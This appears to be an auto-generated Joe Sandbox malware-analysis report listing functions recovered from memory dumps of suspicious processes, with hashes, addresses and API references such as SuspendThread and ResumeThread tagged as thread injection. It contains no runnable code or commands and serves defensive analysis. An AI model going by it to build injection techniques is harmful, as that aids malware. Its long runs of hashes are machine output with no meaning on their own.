Opcode ID: c5e906c2ffeb03824bd74325390c3c3f0fd95e0bc5253a4f30343a68ac394f22
Instruction ID: 362543ec669236a4c6bb6bd27e3eac9423320e466a42b7892a16d381c5825472
Opcode Fuzzy Hash: c5e906c2ffeb03824bd74325390c3c3f0fd95e0bc5253a4f30343a68ac394f22
Instruction Fuzzy Hash: 8DA1B1B1928A8D8FE795DB68C859BAD7FF1FB96304F00817AD04ED32D2CA785815C784

Function 00007FFAAC5BF19D Relevance: 1.7, APIs: 1, Instructions: 189
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SuspendThread.KERNEL32 ref: 00007FFAAC5BF271

Memory Dump Source

Source File: 00000008.00000002.1700372742.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac5b0000_comReviewsvc.jbxd

Similarity

API ID: SuspendThread
String ID:
API String ID: 3178671153-0
Opcode ID: 94b8d660c9462b959c0657dbb3f4ee7ecbf047cfe5028a3ebdc3d2ca30671c7d
Instruction ID: 5338c981717e996eb06fffa0239aa92150baf2e5cbbe75a191e381f108075b97
Opcode Fuzzy Hash: 94b8d660c9462b959c0657dbb3f4ee7ecbf047cfe5028a3ebdc3d2ca30671c7d
Instruction Fuzzy Hash: 3E512A7490861D8FEF98DF98D885AEDBBF0FB5A310F10416AD04DE7252DA71A885CF40

Function 00007FFAAC5C0A37 Relevance: 1.7, APIs: 1, Instructions: 160
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32 ref: 00007FFAAC5C0B31

Memory Dump Source

Source File: 00000008.00000002.1700372742.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac5b0000_comReviewsvc.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c06cb48ec85bcd390d389992981cbdee1818e9356ac72eba4398096a3fc1fcc9
Instruction ID: d0b7dd41e2b8081ef732c7f6d24324f6e6223d8a4c7d6feab8ba749acc50e3f8
Opcode Fuzzy Hash: c06cb48ec85bcd390d389992981cbdee1818e9356ac72eba4398096a3fc1fcc9
Instruction Fuzzy Hash: 57516C7090C78C8FDB46DFA8D855AE9BBF0EF56310F0481AFD049DB2A2DA359846CB51

Function 00007FFAAC5C2875 Relevance: 1.6, APIs: 1, Instructions: 133
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNEL32 ref: 00007FFAAC5C2942

Memory Dump Source

Source File: 00000008.00000002.1700372742.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac5b0000_comReviewsvc.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 261c0416b9d3131d80b85b8472272576833dd85e6837cc63c6697aef5406541a
Instruction ID: fc2e2d1563e838424a6ee40cad9d6c98fdb26461ef97fe3142f593351e946152
Opcode Fuzzy Hash: 261c0416b9d3131d80b85b8472272576833dd85e6837cc63c6697aef5406541a
Instruction Fuzzy Hash: 1241E674A0861C8FDB98DF98D885BEDBBF0FB5A310F10416ED049E7252DA71A886CB40

Function 00007FFAAC5C0B99 Relevance: 1.4, APIs: 1, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32 ref: 00007FFAAC5C0C71

Memory Dump Source

Source File: 00000008.00000002.1700372742.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac5b0000_comReviewsvc.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 3a4f137a223e6a3f189737d297ddc1a9401ba6c1b9b6fb4dd835f6c2b28395b2
Instruction ID: 1b8d7ae9474b468e647f7682abdb8ef4ec5acaebdc65cf511db888d6adb81bda
Opcode Fuzzy Hash: 3a4f137a223e6a3f189737d297ddc1a9401ba6c1b9b6fb4dd835f6c2b28395b2
Instruction Fuzzy Hash: 85416A70D0875C8FDB59DFA8D888BECBBF0EF56310F1041AAD449E7292DA74A885CB41

Function 00007FFAAC4024F9 Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC4024FA

Memory Dump Source

Source File: 00000008.00000002.1698099128.00007FFAAC400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac400000_comReviewsvc.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: bfe308da90a9cd1bcc935e5ca390efcaa0f1bfd61a6b68318c692304bd393488
Instruction ID: 03f54f7a57dc85f1fb4aeed104331552c5b5d748038259380cf2e1348e6170bc
Opcode Fuzzy Hash: bfe308da90a9cd1bcc935e5ca390efcaa0f1bfd61a6b68318c692304bd393488
Instruction Fuzzy Hash: DB113370D486199BEBA8DF14C9597E8B7B1EB55305F0042F9810E932D1CE7859C8CF45

Function 00007FFAAC404812 Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

w, xrefs: 00007FFAAC404874

Memory Dump Source

Source File: 00000008.00000002.1698099128.00007FFAAC400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac400000_comReviewsvc.jbxd

Similarity

API ID:
String ID: w
API String ID: 0-476252946
Opcode ID: 8650400b42684885b6d9a2eb96eb22171a8023efb6ae26fae4ff18e526d3e60d
Instruction ID: d073757035d4e44d209b4ee53a434de73c221f6336b173bfb9e03becd53a443d
Opcode Fuzzy Hash: 8650400b42684885b6d9a2eb96eb22171a8023efb6ae26fae4ff18e526d3e60d
Instruction Fuzzy Hash: D611FE74D49519CBFBA4EB14C9487E9B7B1EB56319F1082E9C00EA32D1DF385A88CF45

Function 00007FFAAC4008E8 Relevance: .2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.1698099128.00007FFAAC400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac400000_comReviewsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 027558b09c1879fde4bfa6cd45fd809a587d5a8cec606265a06af7f2376f6145
Instruction ID: 84211251c6116be98f31acf96d8318a9db30f0b1d87b391c5343d0e1845e3e5b
Opcode Fuzzy Hash: 027558b09c1879fde4bfa6cd45fd809a587d5a8cec606265a06af7f2376f6145
Instruction Fuzzy Hash: B0614971A096499FCF40EF68D494EEDBBF0FF59314F05416AE449E72A2DA34E880CB80

Function 00007FFAAC4008D0 Relevance: .2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.1698099128.00007FFAAC400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac400000_comReviewsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df8fd632b2b02bb1d76b6d9f4f2757adc973d1f33586a7b4e41173563fc98e94
Instruction ID: 16e94d9edda0089b8c07993012b59b1f99549ce02af0e94b603c7a596096d3ca
Opcode Fuzzy Hash: df8fd632b2b02bb1d76b6d9f4f2757adc973d1f33586a7b4e41173563fc98e94
Instruction Fuzzy Hash: 6351A171D0865D8FEB40FBA8D4A5AED7BB0FF48355F14857AD00DD72A2CE34A4818784

Function 00007FFAAC4015FA Relevance: .1, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.1698099128.00007FFAAC400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac400000_comReviewsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e069356d876019fc233dd8607c5ca502119918fe99d0c33902292ca52a506731
Instruction ID: d4df248ff222dc71520ced044a2485b164fb017859375a6600c78e35024e9e80
Opcode Fuzzy Hash: e069356d876019fc233dd8607c5ca502119918fe99d0c33902292ca52a506731
Instruction Fuzzy Hash: 4C312B67A0A2968BD301B7BDF8B64E93FA0DF42276B0C4177D08C8A1A3ED245189C2D1

Function 00007FFAAC400998 Relevance: .1, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.1698099128.00007FFAAC400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac400000_comReviewsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8d5936703eb83b5833fad82db0bab4bb0a987eff558219e5ee13636ab823116
Instruction ID: fea5439ad0484e807bcbb029080884e17321e16f5c07c68e5c65a175b2fb8b7d
Opcode Fuzzy Hash: e8d5936703eb83b5833fad82db0bab4bb0a987eff558219e5ee13636ab823116
Instruction Fuzzy Hash: BD411A7091495D9FEB84EF98C489AEDBBF1FF58345F10417AD40DE3291CA34A8418B94

Function 00007FFAAC400BB5 Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.1698099128.00007FFAAC400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac400000_comReviewsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7726bad152c4b7e83a32a21b8784351210f66be8ecbc20d4dd42f4b078ef58b
Instruction ID: fb75e4c22ee5c68753bf225e9a4185a7ed2ca9c79352d31d08ccd33d371614d4
Opcode Fuzzy Hash: d7726bad152c4b7e83a32a21b8784351210f66be8ecbc20d4dd42f4b078ef58b
Instruction Fuzzy Hash: B141C6B190D686CBF745AB68D4156FD7B60AF43319F088576C00E861E3CE3CA5498795

Function 00007FFAAC40AACE Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.1698099128.00007FFAAC400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac400000_comReviewsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 413e156000068baa77221fb623184cf1e10380a934a29287b0a8c3f294c5ac5c
Instruction ID: 1e2fdd6be9a28f0ef3f1cbd167bf6d8e5518ee70e40d0cd00779111f8d1bad03
Opcode Fuzzy Hash: 413e156000068baa77221fb623184cf1e10380a934a29287b0a8c3f294c5ac5c
Instruction Fuzzy Hash: CE41987094961DCFEBA5DB14C859BE9B7B1FB68305F0041EA900EE2252CB759EC4CF84

Function 00007FFAAC4011A2 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1698099128.00007FFAAC400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac400000_comReviewsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d04d3ddf14bec6c6290808fea23bf5f341ca8a3d2468af72906750c02a211e6d
Instruction ID: 0162c93c05be591de819ae0ba5459ef0db2fca418a4e3a0330896fe44bcc748b
Opcode Fuzzy Hash: d04d3ddf14bec6c6290808fea23bf5f341ca8a3d2468af72906750c02a211e6d
Instruction Fuzzy Hash: 1D21F870A1491ADFEB84EF68C8889ADB7F1FF59305B10457AD41AD72A1DB38E841CB44

Function 00007FFAAC40AB2D Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1698099128.00007FFAAC400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac400000_comReviewsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36e0fd1ec6315b9a71ea050a77a4e076d25f1a219a7eea21850c59ecc4778c3a
Instruction ID: 1ee7e2ddafe406016673e6f6f1913ca341bda3fec5fe465dd87a40842b75ba0b
Opcode Fuzzy Hash: 36e0fd1ec6315b9a71ea050a77a4e076d25f1a219a7eea21850c59ecc4778c3a
Instruction Fuzzy Hash: 13219B7194591D8FDFA9DB14C855AED77B0FBA8305F1041EA900EF3252CA759E84CF80

Function 00007FFAAC400C25 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1698099128.00007FFAAC400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac400000_comReviewsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad65a28e4a812bdb649282371b041f816b1aaacf0473195ac286f7e9e63ca07b
Instruction ID: 3048f3e7e65068c7ca37f4ce4fd2c083d46193615d4aaa7362079e761f078840
Opcode Fuzzy Hash: ad65a28e4a812bdb649282371b041f816b1aaacf0473195ac286f7e9e63ca07b
Instruction Fuzzy Hash: 4B11D576A0D6898FF312A768D8192E97B60DF43315F048577C046DB1E2DA3C550DC795

Function 00007FFAAC402FB6 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1698099128.00007FFAAC400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac400000_comReviewsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7e2f1cb1c736b6dfd378567850e844f8dd921a9f19db7a9917e77238b91d4c0
Instruction ID: a7964df91b3d29edae42a38dcd08f28361c45f3ecda2c11973797bcb96733f1b
Opcode Fuzzy Hash: f7e2f1cb1c736b6dfd378567850e844f8dd921a9f19db7a9917e77238b91d4c0
Instruction Fuzzy Hash: D821D430D4562D9FEBA5EB04C858BB8B7B5AB15715F5080E9800DA2291CE79ABC4CF44

Function 00007FFAAC400C38 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1698099128.00007FFAAC400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac400000_comReviewsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8854bf89ca17ac1119c4e4678942ec05b5321c541289ff4bc9776ec94d36a4e3
Instruction ID: 54a92dac809f47217d6ef2cbce6567e5e3cbad94db116996103c29099b84e687
Opcode Fuzzy Hash: 8854bf89ca17ac1119c4e4678942ec05b5321c541289ff4bc9776ec94d36a4e3
Instruction Fuzzy Hash: F4110471A0EA898FF306AB78D8192E97B60EF43315F048576C04ADB1E2DA3C550D87C5

Function 00007FFAAC400B87 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1698099128.00007FFAAC400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac400000_comReviewsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e996ca71284656ecc2b08d7c6d339fe8a73f8d301e1d3da3c70c6aabb57ee3f
Instruction ID: 3cb7cd5d38c179d0387ab52ed5f9e8f407254e0cece02b7df88ce28e763598bf
Opcode Fuzzy Hash: 4e996ca71284656ecc2b08d7c6d339fe8a73f8d301e1d3da3c70c6aabb57ee3f
Instruction Fuzzy Hash: F501173562464DCFCB44EF28C845AEE77E0FB59308F0542AAE84ED7651C730E565CB81

Function 00007FFAAC400C40 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1698099128.00007FFAAC400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac400000_comReviewsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac699f5808661d0567c3d9df60292b685c9ecbacf22e5af2aab6e703d88b849f
Instruction ID: 51c15d30d42af77a7e42eb99ee27f70936fc5dbce0e9861dd29989c59f3c37ee
Opcode Fuzzy Hash: ac699f5808661d0567c3d9df60292b685c9ecbacf22e5af2aab6e703d88b849f
Instruction Fuzzy Hash: 6911E371A0E6898FF306AB24C8182EA7B70EF43314F0485B6C446DB1E2CA3C550DC785

Function 00007FFAAC400C48 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1698099128.00007FFAAC400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac400000_comReviewsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b49568d07290e111ed706235221a7fa91258189f10289a3208031d223b5d47b
Instruction ID: b4f38ef09674fc3eae3143aa26ed38869965c5912b85a5ba61e083098ad18ab4
Opcode Fuzzy Hash: 6b49568d07290e111ed706235221a7fa91258189f10289a3208031d223b5d47b
Instruction Fuzzy Hash: 2411A17190E689CFF706AB74C8182AABFB0AF43314F0485B6C446DB1E2DA3CA51CC785

Function 00007FFAAC402EB5 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1698099128.00007FFAAC400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac400000_comReviewsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b786834b6ccc8e9351087858ac2f4e1b4ec8aebcf1542f92c9ca0914e5602d85
Instruction ID: 91e96128cf7e4051ac974442eb959d2a05c8110c4edb5cd7848eaa65d26b4cf6
Opcode Fuzzy Hash: b786834b6ccc8e9351087858ac2f4e1b4ec8aebcf1542f92c9ca0914e5602d85
Instruction Fuzzy Hash: 95017C3095A619CFFBB0DB04C8447B877A5EB16714F5080B9C04D922C5CE3CAA848F88

Function 00007FFAAC400C50 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1698099128.00007FFAAC400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac400000_comReviewsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a576cb05c648effcac4bf54118ea03bd4d4b0f0a02138faf3e4ba4e221f72fd
Instruction ID: 2f2e22122fc065691d52bf468a6073bdd2ead82a3e57ff6a08579fb645273283
Opcode Fuzzy Hash: 4a576cb05c648effcac4bf54118ea03bd4d4b0f0a02138faf3e4ba4e221f72fd
Instruction Fuzzy Hash: 8D01C07090E689CFF706AB64C8182AABFB0AF03314F0485A6C446DB1D2DA3C9518C785

Function 00007FFAAC4006A5 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1698099128.00007FFAAC400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac400000_comReviewsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afe49b171713c85e6841230cb2c53a0c4dd61e0ccffa9cb90cf9c91b54664c80
Instruction ID: c911a1a6c93988d531002993d5b7fc7f3aa800522432eca2508b1bd981cc3058
Opcode Fuzzy Hash: afe49b171713c85e6841230cb2c53a0c4dd61e0ccffa9cb90cf9c91b54664c80
Instruction Fuzzy Hash: 44F06D3094594DEFEB80EF28D4486ED7BA1FB55304F104436E40DC2190DA34E294C784

Function 00007FFAAC4006C8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1698099128.00007FFAAC400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac400000_comReviewsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33a0722653fa27a99f4bdc1e2666c9f9d8a2371560ef3841f7d9e81b8314d24b
Instruction ID: d8c60ea008e2452d4e455deb331608265a65876d4a7fd9fbdffa7e1cf0bc0636
Opcode Fuzzy Hash: 33a0722653fa27a99f4bdc1e2666c9f9d8a2371560ef3841f7d9e81b8314d24b
Instruction Fuzzy Hash: 0DF0583080494D9FEB84EF28C4486EA7BE0FB18304F004026A80DD2190DA34E2A4CB80

Function 00007FFAAC40CDDE Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1698099128.00007FFAAC400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac400000_comReviewsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0991103715ecdf92f050cfe49dd37bf5b0663954b2921a35b4fd9e6c7668928
Instruction ID: bd8bc251a074501519f83db650026c0a08552d55002e734427730b4ef4da9e9c
Opcode Fuzzy Hash: a0991103715ecdf92f050cfe49dd37bf5b0663954b2921a35b4fd9e6c7668928
Instruction Fuzzy Hash: DAF0FE70D0951A8BE7E4DB28CC596B977B2EF84340F1081F6900DA2591CE356D869F80

Function 00007FFAAC402F1F Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1698099128.00007FFAAC400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac400000_comReviewsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f74fcf95adbedf357375d68834e559903c42632e7a5c2b675d99aa42b6bdd9d8
Instruction ID: 8e35344aa55118b585ecc7cf8520f65f6aee67af44ecbe14c0f1d89664190fad
Opcode Fuzzy Hash: f74fcf95adbedf357375d68834e559903c42632e7a5c2b675d99aa42b6bdd9d8
Instruction Fuzzy Hash: 0EF0FE30946219CFFBB5DB00C858BB873A5EB55715F5040B9C00D96294CE7CAA88DA88

Non-executed Functions

Function 00007FFAAC5BD50D Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1700372742.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac5b0000_comReviewsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33d6b0cbc06c8ceb8f7d1148c86eb367f38c747c250d7c2b3e0822b8b9c5c286
Instruction ID: d66d5a626755ec79b442bc6548fa071e8de50f3369d91412e0ee1c557feacedc
Opcode Fuzzy Hash: 33d6b0cbc06c8ceb8f7d1148c86eb367f38c747c250d7c2b3e0822b8b9c5c286
Instruction Fuzzy Hash: 8131C170D18A1DCFCF84EF98D451AEDBBF1FB69300F60516AE019E7291DA35A941CB84

Function 00007FFAAC4009B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

Strings

#{9, xrefs: 00007FFAAC400B3E
c9, xrefs: 00007FFAAC400B56
!k9, xrefs: 00007FFAAC400B4E
"s9, xrefs: 00007FFAAC400B46

Memory Dump Source

Source File: 00000008.00000002.1698099128.00007FFAAC400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac400000_comReviewsvc.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 92c938ec5515f308e50e1ab6f9066acec02533d34528c245eca3384c83296ff8
Instruction ID: bba77f65c809bde6a3f14369f71def279782a9d3e5d99f7740357ebf94dd42f6
Opcode Fuzzy Hash: 92c938ec5515f308e50e1ab6f9066acec02533d34528c245eca3384c83296ff8
Instruction Fuzzy Hash: 7F5180C2A4A66355E11233BDB436CF96B649F822BAB6CC637D04EC92F34D2960C582D5

Analysis Process: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exePID: 6196, Parent PID: 932COMMON

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	85%
Signature Coverage:	0%
Total number of Nodes:	20
Total number of Limit Nodes:	1

Executed Functions

Function 00007FFAAC3FB86D Relevance: 10.5, Strings: 7, Instructions: 1753
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

WL_H, xrefs: 00007FFAAC3FCD72
p[, xrefs: 00007FFAAC3FCEED
}, xrefs: 00007FFAAC3FBEE2
6, xrefs: 00007FFAAC3FDDF1
p[, xrefs: 00007FFAAC3FD242
_, xrefs: 00007FFAAC3FC96C
LL_H, xrefs: 00007FFAAC3FD86D

Memory Dump Source

Source File: 0000001E.00000002.2611103822.00007FFAAC3FB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3FB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac3fb000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: 6$ }$LL_H$WL_H$_$p[$p[
API String ID: 0-1835245810
Opcode ID: 9117091a673419e14266d84de50b27bc9bce48f393f6df0b629071279f243753
Instruction ID: d3a41d13d5967431851ec4f43fff94916afe1217dd6f435d95f490b897122bfe
Opcode Fuzzy Hash: 9117091a673419e14266d84de50b27bc9bce48f393f6df0b629071279f243753
Instruction Fuzzy Hash: 1BE21D70D09A598FEB98DF18C895BA9B7B1FF59300F1085A9D00ED7296CE34AD85CF90

Function 00007FFAAC3E0DA0 Relevance: 5.3, Strings: 4, Instructions: 292
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

b4, xrefs: 00007FFAAC3E0F9C
"9, xrefs: 00007FFAAC3E0E47
r6, xrefs: 00007FFAAC3E0F1D
r6, xrefs: 00007FFAAC3E0F40

Memory Dump Source

Source File: 0000001E.00000002.2611103822.00007FFAAC3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac3e0000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: "9$b4$r6$r6
API String ID: 0-2382298496
Opcode ID: 584848a68767f851ad8f5261b9a790b398d7f33c539f19f1e8558ffd818f4176
Instruction ID: d402a46b48bc1b1e2770cac6219dadfb0094f869e11a95eb7758a58d23f2c8fc
Opcode Fuzzy Hash: 584848a68767f851ad8f5261b9a790b398d7f33c539f19f1e8558ffd818f4176
Instruction Fuzzy Hash: 73A1E1B1918A8D8FE784DB68C865BADBFE1FB96340F00417AD04DD32E2CB781812C791

Function 00007FFAAC958974 Relevance: 5.1, Strings: 3, Instructions: 1345
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

X, xrefs: 00007FFAAC9589CF
/, xrefs: 00007FFAAC958A1E
8!, xrefs: 00007FFAAC958B06

Memory Dump Source

Source File: 0000001E.00000002.2622343729.00007FFAAC950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac950000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: 8!$X$/
API String ID: 0-2942311391
Opcode ID: 9456e39bc1ffb261f020b955c206068b3f66a0c8d376bba581e6f3bff56d60fe
Instruction ID: 1a82989fd33a0e6db08af7013bb51e0de8bc74a194730656875d43207864b147
Opcode Fuzzy Hash: 9456e39bc1ffb261f020b955c206068b3f66a0c8d376bba581e6f3bff56d60fe
Instruction Fuzzy Hash: 36927D316589098FDB88FF28D456D7973D2EFA9700B1445B9E40FC72A6DE34EC468B82

Function 00007FFAAC42A000 Relevance: 1.7, Strings: 1, Instructions: 497
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC42A0B3

Memory Dump Source

Source File: 0000001E.00000002.2611103822.00007FFAAC42A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC42A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac42a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: bd31d902af7b7a980b9a6227e7ec4cb9f04de55b86ef3c81ec59f177774455b1
